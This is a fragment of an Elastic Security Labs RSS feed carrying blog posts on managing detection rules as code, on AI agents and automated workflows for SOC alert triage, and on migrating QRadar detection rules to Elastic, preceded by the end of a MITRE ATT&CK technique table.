<tbody>
<tr>
<td>Execution</td>
<td>Scheduled Task/Job</td>
<td>T1053.005</td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>File and Directory Permissions Modification</td>
<td>T1222</td>
</tr>
<tr>
<td>Discovery</td>
<td>Local Storage Discovery</td>
<td>T1680</td>
</tr>
<tr>
<td>Impact</td>
<td>Data Destruction</td>
<td>T1485</td>
</tr>
<tr>
<td>Impact</td>
<td>System Shutdown/Reboot</td>
<td>T1529</td>
</tr>
</tbody>
</table>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/dynowiper/image1.jpg" length="0" type="image/jpeg"/>
        </item>
        <item>
            <title><![CDATA[The Engineer's Guide to Elastic Detections as Code]]></title>
            <link>https://www.elastic.co/security-labs/detection-as-code-timeline-and-new-features</link>
            <guid>detection-as-code-timeline-and-new-features</guid>
            <pubDate>Wed, 04 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This post details the latest evolution of Elastic Security's Detections as Code (DaC) framework, including its development timeline, current feature highlights, and tailored implementation examples.]]></description>
<content:encoded><![CDATA[<p>In an ever-evolving threat landscape, security operations are reaching a tipping point. As the velocity and complexity of threats increase, teams expand, managed environments multiply, and manual approaches to rule management commonly become a bottleneck. This is where Detections as Code (DaC) steps in, not just as a tool but as a methodology.</p>
<p>DaC as a methodology applies software development practices to the creation, management, and deployment of security detection rules. By treating detection rules as code, it enables version control, automated testing, and deployment processes, enhancing collaboration, consistency, and agility in response to threats. DaC streamlines the detection rule lifecycle, ensuring high-quality detections through peer reviews and automated tests. This methodology also supports compliance with change management requirements and fosters a mature security posture.</p>
<p>That's why we’re excited to share the latest updates to Elastic's <a href="https://github.com/elastic/detection-rules">detection-rules</a> repository, our open resource for writing, testing, and managing security detection rules in Elastic, which also allows you to create your own <a href="https://dac-reference.readthedocs.io/en/latest/">Detections as Code (DaC) framework</a>. Continue reading for highlighted implementation examples using the extended functionality, and for the announcement of Elastic's free Detections as Code workshop.</p>
<h1>Elastic Security DaC: The journey from alpha to general availability</h1>
<p>With the functionality now provided in the <a href="https://github.com/elastic/detection-rules">detection-rules</a> repository, users can manage all of their detection rules as code, review rule tunings, automatically test and validate rules, and automate rule deployment across their environments.</p>
<h2>Pre-2024: Elastic’s internal use of DaC</h2>
<p>Elastic's threat research and detection engineering teams created and used the <a href="https://github.com/elastic/detection-rules">detection-rules</a> repository to develop, test, manage, and release prebuilt rules, following DaC principles: reviewing rules as a team and automating their testing and release. The repository also includes an interactive CLI for creating rules, so engineers can start working on rules right there.</p>
<p>As the security community's interest in as-code principles grew, and because the Elastic Security APIs already allowed users to implement custom Detections as Code solutions, Elastic decided to extend the <a href="https://github.com/elastic/detection-rules">detection-rules</a> repository's functionality so that users could benefit from our tooling when creating their own DaC processes.</p>
<p>Here are the key milestones of Elastic’s user-focused DaC development from alpha to general availability.</p>
<h2>May 2024: Alpha release of new &quot;roll your own&quot; features</h2>
<p>Our detection-rules repository was adjusted for customer use, allowing users to manage custom rules, adapt the test suite to their needs, and manage actions and exceptions alongside the rules.</p>
<p>Key additions:</p>
<ul>
<li>Custom rules directory support</li>
<li>Selection of which tests to run based on your requirements</li>
<li><a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/rule-exceptions">Exceptions</a> and Actions support</li>
</ul>
<p>We also published extensive <a href="https://dac-reference.readthedocs.io/en/latest/">guidance</a> for Detections as Code, with examples of implementation in Elastic Security using the <a href="https://github.com/elastic/detection-rules">detection-rules</a> repository.</p>
<h2>August 2024: &quot;Roll your own&quot; features now in beta</h2>
<p>The functionality was extended to allow importing and exporting custom rules between Elastic Security and the repository, add more configuration options, and extend versioning to custom rules.</p>
<p>New features added:</p>
<ul>
<li>Bulk import/export of custom rules (based on Elastic Security APIs)</li>
<li>Fully configurable unit tests, validation, and schemas</li>
<li>Version lock for custom rules</li>
</ul>
<h2>March - August 2025: &quot;Roll your own&quot; features are generally available and supported</h2>
<p>Using DaC with Elastic Security 8.18 and up:</p>
<ul>
<li><a href="https://www.elastic.co/guide/en/security/8.18/whats-new.html#_customize_and_manage_prebuilt_detection_rules">Supports prebuilt rules management</a>. You can export all prebuilt rules from Elastic Security and store them alongside your custom rules.</li>
<li>Support for rules filtering for export added.</li>
</ul>
<p>Adjacent to DaC efforts, we also released new Terraform resources (<a href="https://github.com/elastic/terraform-provider-elasticstack/releases/tag/v0.12.0">v0.12.0</a> and <a href="https://github.com/elastic/terraform-provider-elasticstack/releases/tag/v0.13.0">v0.13.0</a>) in October-December 2025, allowing Terraform users to manage detection rules and exceptions.</p>
<p>With this foundation spelled out, let's explore the powerful features that are available to streamline your detection engineering process.</p>
<h1>Detection-rules DaC functionality highlights</h1>
<p>There are a few worthwhile additions since our <a href="https://www.elastic.co/security-labs/dac-beta-release">last DaC publication</a>, which we’ll expand on below.</p>
<h2>Additional filters</h2>
<p>The <a href="https://github.com/elastic/detection-rules/blob/main/CLI.md#exporting-rules">filter functionality</a> available when exporting rules from Kibana has been extended to allow you to precisely define which rules to sync in DaC. Here are the new flags:</p>
<table>
<thead>
<tr>
<th align="center">Flag</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td align="center"><strong>-cro</strong></td>
<td>Filters the export to only include rules created by the user (not Elastic prebuilt rules).</td>
</tr>
<tr>
<td align="center"><strong>-eq</strong></td>
<td>Applies a query filter to the rules being exported.</td>
</tr>
</tbody>
</table>
<p>Let’s take an example where you wish to organize rules by data source and want to export the AWS rules to a specific folder. In this case, let’s filter on data source tags and export all rules with the <code>Data Source: AWS</code> tag:</p>
<pre><code># -d:   write rules to the dac_test/rules folder
# -sv:  strip the version fields from all rules
# -cro: export only custom rules
# -eq:  export only rules with the &quot;Data Source: AWS&quot; tag
python -m detection_rules kibana export-rules -d dac_test/rules -sv -cro \
  -eq 'alert.attributes.tags: &quot;Data Source: AWS&quot;'
</code></pre>
<p>See the Kibana documentation on <a href="https://www.elastic.co/docs/api/doc/kibana/operation/operation-performrulesbulkaction#operation-performrulesbulkaction-body-application-json-query">query string filtering</a> for the underlying API call used here, and the <a href="https://www.elastic.co/docs/api/doc/kibana/operation/operation-findrules">list all detection rules API call</a> for examples of fields available to construct the query filter.</p>
<h2>Custom folder structure</h2>
<p>In the detection-rules repo, we use a folder structure based on platform, integration, and MITRE ATT&amp;CK information. This helps with our organization and rule development, but it is by no means the only method: depending on your use case, you may want to organize your rules by customer, date, or source, for example.</p>
<p>Whether you use this export process or manual organization, once you have your rules in a folder structure that you like, you can keep this local structure even when re-exporting rules. Note that new rules need to be placed in their desired location manually: the local rule-loading mechanism detects where existing rules are on disk to know where to put their updates, and falls back to the specified output directory for rules it has not seen before. To use local rule loading when updating existing rules, pass the <code>--load-rule-loading / -lr</code> flag to the <code>kibana export-rules</code> and <code>import-rules-to-repo</code> commands. This flag enables the use of the local folders specified in your <code>config.yaml</code>.</p>
<p>Let’s look at an example with the rules organized in folders the following way:</p>
<pre><code>rules/
    my_test_rule.toml
another_rules_dir/
    high_number_of_process_and_or_service_terminations.toml
</code></pre>
<p>We’ll specify the following in the <code>config.yaml</code> file:</p>
<pre><code>rule_dirs:
- rules
- another_rules_dir
</code></pre>
<p>With the new <code>-lr</code> option, rule updates from Kibana will now use these additional paths instead of exporting directly to the specified directory.</p>
<p>Running <code>python -m detection_rules kibana --space test_local export-rules -d dac_test/rules/ -sv -ac -e -lr</code> will export rules from the <code>test_local</code> space: <code>my_test_rule.toml</code> will be written to <code>dac_test/rules/</code>, as it was already on disk there, and <code>high_number_of_process_and_or_service_terminations.toml</code> will be written to <code>dac_test/another_rules_dir/</code>.</p>
<p>This can be particularly useful if you have the same rules in different sub-folder configurations for different customers. For example, let’s say you have your rules broken down by platform and integration similar to Elastic’s prebuilt rule folder structure. For your customers, SOCs, or threat-hunting teams, having the rules organized underneath these platform/integration folders may be the most useful mechanism for them to manage the rules. However, your information security team or primary detection engineering team may want to manage the rules by initiative or rule author instead so that all the rules a particular individual or team is responsible for are organized in one place. Now with the local rule-loading flags, you can simply have two configuration files and the duplicated rules in each structure. When you are exporting updates for the rules, you would then use the environment variable to select the appropriate configuration file and export the rule updates. These updates will then be applied to the rules in place, maintaining the directory structure.</p>
<h2>Miscellaneous local loading updates</h2>
<p>In addition to the above, we have added two smaller new features designed to help users who are adding local information in the detection rules TOML files and schema. These are as follows:</p>
<ol>
<li>Local date support, where the creation date from the original local file is maintained on re-export.</li>
<li>Upgrades to the automatic schema generation feature to inherit known field types from existing schemas.</li>
</ol>
<p>The local date component can be useful when one wants more manual control over the date field in the file. Without using the override, the date will be based on when the Kibana rule contents were exported. Using the <code>--local-creation-date</code> flag, the date will not be updated when the file contents are re-exported.</p>
<p>The automatic schema generation has been updated to inherit field types from other indices/integrations when they are present. This produces a potentially more accurate schema and reduces the need for manual updates after the fact. For example, suppose you have a rule that uses the index <code>new-integration*</code> with the following fields:</p>
<ul>
<li><code>host.os.type.new_field</code></li>
<li><code>dll.Ext.relative_file_creation_time</code></li>
<li><code>process.name.okta.thread</code></li>
</ul>
<p>Instead of each of these fields being added to the schema with a default type, their types are inherited from existing schemas. In this case, the types for <code>dll.Ext.relative_file_creation_time</code> and <code>process.name.okta.thread</code> are inherited.</p>
<pre><code>{
  &quot;new-integration*&quot;: {
    &quot;dll.Ext.relative_file_creation_time&quot;: &quot;double&quot;,
    &quot;host.os.type.new_field&quot;: &quot;keyword&quot;,
    &quot;process.name.okta.thread&quot;: &quot;keyword&quot;
  }
}
</code></pre>
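<p>The inheritance behavior can be pictured with a short sketch (hypothetical code, not the actual detection-rules implementation; the <code>known_schemas</code> sample data is invented for illustration):</p>

```python
def auto_gen_schema(fields, known_schemas, default_type="keyword"):
    """Build a schema for a new index pattern, inheriting field types that
    any existing schema already knows and defaulting the rest."""
    schema = {}
    for field in sorted(fields):
        # Inherit the type from the first known schema that defines this field.
        schema[field] = next(
            (types[field] for types in known_schemas.values() if field in types),
            default_type,
        )
    return schema


# Invented sample of existing schema knowledge for two integrations.
known_schemas = {
    "endpoint": {"dll.Ext.relative_file_creation_time": "double"},
    "okta": {"process.name.okta.thread": "keyword"},
}

new_fields = [
    "host.os.type.new_field",
    "dll.Ext.relative_file_creation_time",
    "process.name.okta.thread",
]
```

<p>With these inputs, the two fields known to existing schemas inherit <code>double</code> and <code>keyword</code>, while the unknown field falls back to the default type.</p>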
<p>To see how to use this with your custom data types, see the <a href="#Custom-schemas-usage">Custom schemas usage</a> section within the Implementation examples part of this blog.</p>
<h1>Expanding on usage examples</h1>
<p>Below you will find more examples of DaC implementations. These are not focused on new functionality additions, but go deeper on topics we see discussed in the community.</p>
<p>It’s worth noting that Detections as Code features are provided as components that can be used to build a custom implementation for your chosen process and architecture. When implementing DaC in your production environment, treat it as an engineering process and follow <a href="https://dac-reference.readthedocs.io/en/latest/dac_concept_and_workflows.html#best-practices">the best practices.</a></p>
<h2>DaC implementation with Gitlab</h2>
<p>Implementations of DaC typically revolve around using some form of CI/CD product to automatically perform rule management based on a given trigger. These triggers vary considerably based on the desired setup, specifically the authoritative source of rules and the desired state of your version control system (VCS). For a much more in-depth exploration of some of these considerations, see our <a href="https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_vcs_to_elastic_security.html">DaC Reference Material</a>. Below is a simple example using GitLab as the VCS provider and its built-in GitLab CI/CD.</p>
<pre><code>stages:                # Define the pipeline stages
  - sync               # Add a 'sync' stage

sync-to-production:    # Define a job named 'sync-to-production'
  stage: sync          # Assign this job to the 'sync' stage
  image: python:3.12   # Use the Python 3.12 Docker image
  variables:
    CUSTOM_RULES_DIR: $CUSTOM_RULES_DIR    # Set custom rules env var
  script:                                  # List of commands to run 
    - python -m pip install --upgrade pip  # Upgrade pip
    - pip cache purge                      # Clear pip cache
    - pip install .[dev]                   # Install package w/ dev deps
    - |  # Multi-line command to import rules                                        
      FLAGS=&quot;-d ${CUSTOM_RULES_DIR}/rules/ --overwrite -e -ac&quot;
      python -m detection_rules kibana --space production import-rules $FLAGS
  environment:
    name: production   # Specify deployment environment as 'production'
  only:
    refs:
      - main           # Run this job only on the 'main' branch
    changes:
      - '**/*.toml'    # Run this job only if .toml files have changed

</code></pre>
<p>This is very similar to the built-in CI/CD of other Git-based VCS platforms like GitHub and Gitea, the main difference being the syntax that determines the triggering event. The DaC commands such as <code>kibana import-rules</code> would be the same regardless of VCS. In this example, we are syncing rules from our fork of the detection-rules repo to our Kibana Production Space. This builds on a number of prior decisions, for instance requiring unit tests to pass before merging rule updates and treating rules on main as ready for production. For a GitHub-based walkthrough of the considerations behind this particular approach, please take a look at our <a href="https://dac-reference.readthedocs.io/en/latest/etoe_reference_example.html#demo-video">demo video</a>.</p>
<h2>Custom Unit Testing tips and examples</h2>
<p>When considering DaC as a capability to add to your detection toolkit, setting up the CI/CD and base infrastructure should be considered the first step in an ongoing process to improve the quality and usefulness of your rules. One of the key purposes of having “as code” tooling is the ability to further customize that tooling to your needs and environment.</p>
<p>One example of this is unit testing for rules. Beyond base functionality testing, some other key existing unit tests enforce Elastic-specific considerations around rule performance and optimization, as well as organization of metadata and tagging. This helps detection engineers and threat researchers remain consistent in their rule development. Building on this example, one may want to consider adding custom unit tests based on your specific needs.</p>
<p>To illustrate this, take a Security Operations Center (SOC) environment where a number of analysts are responsible for various domains and tasks. When an alert is raised in the SIEM, it may not be immediately obvious who should handle remediation, or which team(s) need to be informed of the incident. Tagging rules with a team tag (e.g. <code>Team: Windows Servers</code>), similar to how Elastic uses tags for data sources, gives the SOC a point of contact directly in the alert for who can help with remediation.</p>
<p>In our DaC environment, we can quickly create a new testing module to enforce this on all of the custom rules (or the pre-built ones too). For this test, we are going to enforce having a <code>Team: &lt;some name&gt;</code> tag on all production rules that are not authored by Elastic. In the detection-rules repo, testing is handled through the Python test framework <code>pytest</code>, so unit tests are organized into Python modules (files) and classes and functions within those files under the <code>tests/</code> folder. To add tests, either add classes or functions to the existing files or create a new file. In general, we recommend creating new test files so that you can receive updates to the existing tests from Elastic without having to merge the differences.</p>
<p>We will start by creating a new python file called <code>test_custom_rules.py</code> in the <code>tests/</code> directory with the following contents:</p>
<pre><code class="language-py"># test_custom_rules.py

&quot;&quot;&quot;Unit Tests for Custom Rules.&quot;&quot;&quot;

from .base import BaseRuleTest


class TestCustomRules(BaseRuleTest):
    &quot;&quot;&quot;Test custom rules for given criteria.&quot;&quot;&quot;

    def test_custom_rule_team_tag(self):
        &quot;&quot;&quot;Unit test that all custom rules have a Team: &lt;team_name&gt; tag.&quot;&quot;&quot;
        tag_format = &quot;Team: &lt;team_name&gt;&quot;
        for rule in self.all_rules:
            if &quot;Elastic&quot; not in rule.contents.data.author:
                tags = rule.contents.data.tags
                if tags:
                    self.assertTrue(
                        any(tag.startswith(&quot;Team: &quot;) for tag in tags),
                        f&quot;Custom rule {rule.contents.data.rule_id} does not have a {tag_format} tag&quot;,
                    )
                else:
                    raise AssertionError(
                        f&quot;Custom rule {rule.contents.data.rule_id} does not have any tags, include a {tag_format} tag&quot;
                    )
</code></pre>
<p>Now each non-Elastic rule will be required to have a tag in the specified pattern identifying the team responsible for remediation, e.g. <code>Team: Team A</code>.</p>
<h2>Custom schemas usage</h2>
<p>Elastic’s ability to bring your own data types also extends to our DaC capabilities. For example, let’s take a look at some custom schemas for network protocols. Your rules can of course query any of the diverse data in your stack, and you will want the same validation and testing to apply to custom rules over these data types too. This is where custom schemas come in handy.</p>
<p>When we are validating queries, the query is parsed into the respective fields and the types of these fields are compared against what is provided in a given schema (e.g. <a href="https://www.elastic.co/docs/reference/ecs/ecs-field-reference">ECS schema</a>, the AWS Integration for AWS data, etc.). For custom data types, this follows the same validation path, with the ability to pull from locally defined custom schemas. These schema files can be built by hand as one or more json files; however, if you have some sample data already in your stack, you can take advantage of this and use it as validation and generate your schemas automatically.</p>
<p>Assuming you already have a custom rules folder configured (if not, see the setup instructions), you can turn on automatic schema generation by adding <code>auto_gen_schema_file: &lt;path_to_your_json_file&gt;</code> to your config file. This generates a schema file in the specified location, with an entry for each field and index combination. The file is updated during any command where rule contents are validated against a schema, including <code>import-rules-to-repo</code>, <code>kibana export-rules</code>, <code>view-rule</code>, and others. It is also automatically added to your <code>stack-schema-map.yaml</code> file when using a custom rules directory and config.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/detection-as-code-timeline-and-new-features/image1.gif" alt="" /></p>
<p>With this power comes increased responsibility for rule reviewers, as any field used in the query is immediately assumed to be valid and added to the schema. One way to mitigate the risk is to use a development space that has access to the data. In the PR, one can then link to a successful execution of the query, with stack-level validation of its data types. Once this is approved, you can remove the <code>auto_gen_schema_file</code> entry from the config, leaving a known valid schema based on your custom data. This provides a baseline for other rule authors to build upon as needed and maintains type-checking validation.</p>
<h1>Learn more about DaC and try it yourself</h1>
<p>You can experience Elastic Security's Detections as Code (DaC) functionality firsthand with our interactive <a href="https://play.instruqt.com/elastic/invite/uqlknuayvxhy">Instruqt training</a>. This training provides a straightforward way to explore core DaC features in a pre-configured test environment, eliminating the need for manual setup. Give it a try!</p>
<p>If you are implementing DaC, share your experience, ask your questions and help others on the community slack <a href="https://elasticstack.slack.com/archives/C06TE19EP09">DaC channel</a>.</p>
<h2>Trial Elastic Security</h2>
<p>To experience the full benefits of what Elastic has to offer for detection engineers, start your Elastic Security <a href="https://cloud.elastic.co/registration">free trial</a>. Visit <a href="https://www.elastic.co/security">elastic.co/security</a> to learn more.</p>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/detection-as-code-timeline-and-new-features/image2.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[From Alert Fatigue to Agentic Response: How Workflows and Agent Builder Close the Loop]]></title>
            <link>https://www.elastic.co/security-labs/from-alert-fatigue-to-agentic-response</link>
            <guid>from-alert-fatigue-to-agentic-response</guid>
            <pubDate>Tue, 03 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Attempting to chase individual alerts is a losing strategy. To succeed, we have to move beyond simple automation scripts and into the era of Agentic AI.]]></description>
            <content:encoded><![CDATA[<p>SOC leaders face a daily battle against basic math that doesn’t add up. Data volumes are growing exponentially, attack surfaces are expanding globally, yet your team’s capacity remains linear. You cannot hire your way out of this problem.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/from-alert-fatigue-to-agentic-response/image2.png" alt="Line chart demonstrating exponential increase in data, alerts, insights and linear increase in human capacity" /></p>
<p>Attempting to chase individual alerts is a losing strategy. To succeed, we have to move beyond simple automation scripts and into the era of Agentic AI.</p>
<p>At Elastic, we view the modern security operation as an operational nervous system. It needs Senses (the data foundation to see everything), a Brain 🧠 (AI-driven analytics to find the signal in the noise), and Hands 🙌 (Workflows to execute actions and drive outcomes).</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/from-alert-fatigue-to-agentic-response/image1.png" alt="" /></p>
<p>With the introduction of Agent Builder and Elastic Workflows, we are unifying these elements. We aren't just giving you a chatbot; we are giving you the ability to construct an autonomous SOC where agents reason over data and workflows execute sophisticated actions—bidirectionally.</p>
<p>Here is how these two powerful engines work together to transform your security operations.</p>
<h2>The Power of &quot;Brain&quot; and &quot;Hands&quot; Working Together</h2>
<p>To understand why this combination is significant, we must differentiate their roles.</p>
<ul>
<li><strong>Elastic Workflows (The Hands):</strong> These are deterministic. They are perfect for rigid, repeatable processes—&quot;If X happens, create a Jira ticket, ping Slack, and isolate the host.&quot; They provide structure, auditability, and reliability.</li>
<li><strong>Agent Builder (The Brain):</strong> Agents are probabilistic and reasoning-based. They perceive the environment, plan a sequence of steps, and adapt. An agent can look at a vague threat report and decide <em>which</em> queries to run to find evidence.</li>
</ul>
<p><strong>The magic happens when they interact:</strong> Previously, you had to choose between a rigid playbook or a manual investigation. Now, <strong>Workflows can invoke Agents</strong> to perform complex analysis during an automation loop, and <strong>Agents can invoke Workflows</strong> as tools to perform reliable, heavy-lifting actions during a chat.</p>
<h2>What This Isn't</h2>
<p>Let's be clear: this isn't about replacing your analysts. It's about removing the toil that keeps them from doing the work that actually matters - the creative, adversarial thinking that no model can replicate. The goal is to shift your team from being reactive log-chasers to proactive threat hunters. The agent handles the grunt work; your people handle the judgment calls.</p>
<h2>Use Case: Automated Triage at Alert Time</h2>
<p><em>From Alert to Analysis without Human Intervention</em></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/from-alert-fatigue-to-agentic-response/image6.png" alt="" /></p>
<p>Let’s look at a real-world scenario involving a ransomware attack (ex: <em>BlackCat/ALPHV</em>, a ransomware-as-a-service operation). In a traditional setup, an alert fires, and an analyst spends 30 minutes gathering logs, checking VirusTotal, and writing a summary.</p>
<p>With Elastic, this entire triage phase is automated before the analyst opens their laptop, reducing mean-time-to-triage from 30 minutes to under 2 minutes.</p>
<p><strong>The Workflow:</strong></p>
<ol>
<li><strong>Trigger:</strong> <strong>Attack Discovery</strong> runs on a schedule and correlates 15 disparate alerts into a single, high-fidelity Attack Chain.</li>
<li><strong>Workflow Step (Enrichment):</strong> The workflow is triggered automatically and loops through every entity involved—hosts, users, file hashes. It runs a lookup against threat intel sources like VirusTotal.</li>
<li><strong>Workflow Step (Invoke Agent):</strong> The workflow passes this bundle of data to a specific <strong>&quot;Triage Agent.&quot;</strong></li>
<li><strong>Agent Execution:</strong> The agent doesn't just copy-paste data. It <em>reasons</em> over the attack chain, compares it against the MITRE ATT&amp;CK framework, correlates related logs, and generates a human-readable investigation summary tailored for a Tier 2 analyst.</li>
<li><strong>Outcome:</strong> The workflow posts this AI-generated analysis directly into a new Case, complete with severity scoring, deep dive investigation, root cause analysis, and recommended next steps.</li>
</ol>
<p><strong>User Impact:</strong> The analyst starts their day reviewing a fully contextualized case, not chasing raw logs.</p>
<h2>Use Case: The &quot;Human-in-the-Loop&quot; Investigation</h2>
<p><em>Turning Natural Language into Deterministic Action</em></p>
<p>Once an analyst is investigating, they often need to perform administrative tasks that break their flow like finding out who is on-call, setting up war rooms, or notifying leadership.</p>
<p>In Elastic Security, the analyst stays in the chat interface. Because we allow you to define Workflows as <strong>Tools</strong> for your agents, the analyst can simply ask the agent to handle the logistics.</p>
<p><strong>The Workflow:</strong></p>
<ol>
<li><strong>Analyst Prompt:</strong> <em>&quot;We have a confirmed incident. Who is on call? Please create a Slack channel for this incident and invite them.&quot;</em></li>
<li><strong>Agent Reasoning:</strong> The agent recognizes the intent matches an &quot;Incident Response Setup&quot; workflow tool you have pre-configured.</li>
<li><strong>Workflow Execution:</strong>
<ul>
<li>Step 1: Queries the PagerDuty integration to find the on-call engineer.</li>
<li>Step 2: Calls the Slack API to create a channel named <code>#incident-[id]</code>.</li>
<li>Step 3: Posts the initial case summary into that channel.</li>
</ul>
</li>
<li><strong>Outcome:</strong> The agent confirms to the analyst: <em>&quot;I have created channel #incident-982 and added Jane Doe (On-Call) to the channel.&quot;</em></li>
</ol>
<h2>Use Case: Guided Remediation and Containment</h2>
<p><em>Precision Response at Speed</em></p>
<p>When it is time to contain a threat, speed is critical, but so is safety. You don't want an LLM &quot;hallucinating&quot; an API call to a firewall. This is where the Agent + Workflow combination shines for safety.</p>
<p><strong>The Workflow:</strong></p>
<ol>
<li><strong>Analyst Prompt:</strong> <em>&quot;Isolate the host involved in the BlackCat alert.&quot;</em></li>
<li><strong>Agent Reasoning:</strong> The agent identifies the <code>host123</code> host from the context of the investigation. It creates a plan to invoke the &quot;Host Isolation&quot; workflow.</li>
<li><strong>Decision Point:</strong> The Agent presents the plan to the user: <em>&quot;I am about to trigger the 'Isolate Host' workflow for host123 via Elastic Defend.&quot;</em></li>
<li><strong>Workflow Execution:</strong> The deterministic workflow executes the isolation command via Elastic Defend (XDR), ensuring the action is logged and performed exactly as defined by your engineering team.</li>
<li><strong>Outcome:</strong> The host is isolated immediately.</li>
</ol>
<p><strong>User Impact:</strong> You get the ease of natural language interaction with the safety and audit trails of hard-coded automation.</p>
<p>We are moving away from a world where you have to choose between flexible AI chat and rigid SOAR playbooks. The future is an Autonomous SOC where the two are inextricably linked.</p>
<p>By using Agent Builder to create custom agents that understand your specific environment (using RAG with your own data) and equipping them with Elastic Workflows as tools, you effectively multiply your team's capacity and scale expertise. You are not just deploying a chatbot; you are deploying a virtual team member that knows your runbooks, respects your permissions, and works 24/7.</p>
<p>For more detailed information on getting started with Agent Builder read this <a href="https://www.elastic.co/search-labs/blog/ai-agent-builder-elasticsearch">blog</a>.</p>
<p>Agent Builder and Workflows are available now as a tech preview. Get started with an <a href="https://cloud.elastic.co/registration">Elastic Cloud Trial</a>, and check out the documentation for Agent Builder <a href="https://www.elastic.co/docs/solutions/search/elastic-agent-builder">here</a>, and Workflows <a href="https://cloud.elastic.co/registration">here</a>.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/from-alert-fatigue-to-agentic-response/photo-edited-03.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[From QRadar to Elastic: Automate your Detection Rule Migration]]></title>
            <link>https://www.elastic.co/security-labs/from-qradar-to-elastic</link>
            <guid>from-qradar-to-elastic</guid>
            <pubDate>Tue, 03 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Today, we are excited to announce a major expansion to our Automatic Migration feature that changes that narrative. In Elastic Security 9.3, we are introducing Automatic Migration support for QRadar detection rules (now in Tech Preview), joining our existing Splunk translation capabilities to further expedite your journey to Elastic Security. Let's take a closer look at what's supported.]]></description>
            <content:encoded><![CDATA[<h1>From QRadar to Elastic: Automate Your Detection Rule Migration</h1>
<p>Migrating to a new SIEM is often viewed as a daunting task. The sheer volume of legacy detection rules, <a href="https://www.elastic.co/blog/automatic-migration-for-dashboards">dashboards</a>, and custom configurations can keep security teams locked into aging infrastructure simply because the cost of moving — measured in manual effort and time — is too high.</p>
<p>Today, we are excited to announce a major expansion to our Automatic Migration feature that changes that narrative. In Elastic Security 9.3, we are introducing Automatic Migration support for QRadar detection rules (now in Tech Preview), joining our existing Splunk translation capabilities to further expedite your journey to Elastic Security. Let's take a closer look at what's supported.</p>
<h2>Why SIEM Migration is Changing</h2>
<p>Traditionally, organizations had to manually rewrite every rule when switching platforms. This created a significant bottleneck where security coverage was either delayed or lost during the transition. With the latest updates to Automatic Migration, MSSPs and large organizations running multiple SIEMs can now translate both Splunk and QRadar rules into Elastic-native logic automatically.</p>
<h2>What’s Supported for Automatic Migration for QRadar</h2>
<p>The same <a href="https://www.elastic.co/blog/automatic-migration-ai-rule-translation">mapping and translation</a> process is applied as for prior rule types, now with support for XML-exported QRadar rules. The following rule types are supported:</p>
<ul>
<li>Event - focuses on log and event data.</li>
<li>Flow - typically related to network detection scenarios.</li>
<li>Common - a combination of event and flow rules.</li>
</ul>
<p>We aren't just moving text; we are preserving the intelligence of your security operations. Reference sets are considered as part of the translation logic: we automatically put this information into lookup indexes where applicable. For more information on ES|QL lookup join syntax, check out our <a href="https://www.elastic.co/docs/reference/query-languages/esql/esql-lookup-join">docs</a>. MITRE mappings are also preserved, so that when a migrated rule is installed in Elastic it keeps its ATT&amp;CK mapping. Behind the scenes, we also take all building block rules into account; these building blocks contribute to the translation logic, as seen in the summary tab for individual rules.</p>
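<p>As an illustration of what such a lookup can look like (the index and field names below are invented for this example, not output of the migration), a reference set converted into a lookup index could be joined against event data with ES|QL’s <code>LOOKUP JOIN</code>:</p>

```esql
FROM logs-network.flows-*
| LOOKUP JOIN qradar_blocked_ips ON source.ip
| WHERE blocklist_category IS NOT NULL
```

<p>Note that the joined index must be created in lookup mode (<code>index.mode: lookup</code>) for <code>LOOKUP JOIN</code> to work.</p>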
<h2>Streamlining the onboarding process</h2>
<p>A common &quot;chicken and egg&quot; problem in SIEM migrations is whether to move data or rules first. Our framework provides flexibility for both:</p>
<ol>
<li>Rule-First Insight: You can translate rules before onboarding data. Elastic will identify which integrations are required for those rules to work, allowing you to prioritize your data onboarding.</li>
<li>Data-First Traditionalism: If you prefer, you can onboard your log sources first and then migrate the rules to match.</li>
<li>Custom Data: For unique sources, use <a href="https://www.elastic.co/docs/solutions/security/get-started/automatic-import">Automatic Import</a> to ingest custom data in minutes.</li>
</ol>
<p>By identifying exactly which integrations are needed before moving a single log, teams can build a precise, risk-aware roadmap for their migration project. This transparency eliminates the guesswork and helps ensure that critical visibility gaps are addressed long before you fully decommission your legacy environment.</p>
<h2>Getting started with Automatic Migration for Detection Rules</h2>
<p>To get started with Automatic Migration for Detection Rules, after deciding on migrating your detection rules and data, follow these simple steps:</p>
<ol>
<li>Navigate to Elastic Security’s “Get started” page and configure your AI Provider.</li>
</ol>
<p><img src="https://www.elastic.co/security-labs/assets/images/from-qradar-to-elastic/image1.png" alt="" /></p>
<ol start="2">
<li>Select the drop-down at the top right and choose QRadar. Let Elastic guide you through exporting your rules from QRadar and uploading them into Elastic Security. Elastic handles the finer details by scanning for reference sets and MITRE mappings, and prompts you to upload them when found. MITRE mappings can only be included at the time of the initial translation, so make sure to include them if you have this information.</li>
</ol>
<p><img src="https://www.elastic.co/security-labs/assets/images/from-qradar-to-elastic/image3.png" alt="" /></p>
<ol start="3">
<li>Once the rules are uploaded, you can view their status.</li>
</ol>
<ul>
<li>Installed: Already added to Elastic SIEM. Click View to manage and enable it.</li>
<li>Translated: Ready to install. This rule was mapped to an Elastic-authored rule, or translated by Automatic Migration. Click Install to install it.</li>
<li>Partially translated: Part of the query could not be translated. You may need to specify an index pattern for the rule query, upload missing files, or fix broken rule syntax.</li>
<li>Not translated: None of the original query could be translated.</li>
<li>Failed: Translation failed. Refer to the error for details.</li>
</ul>
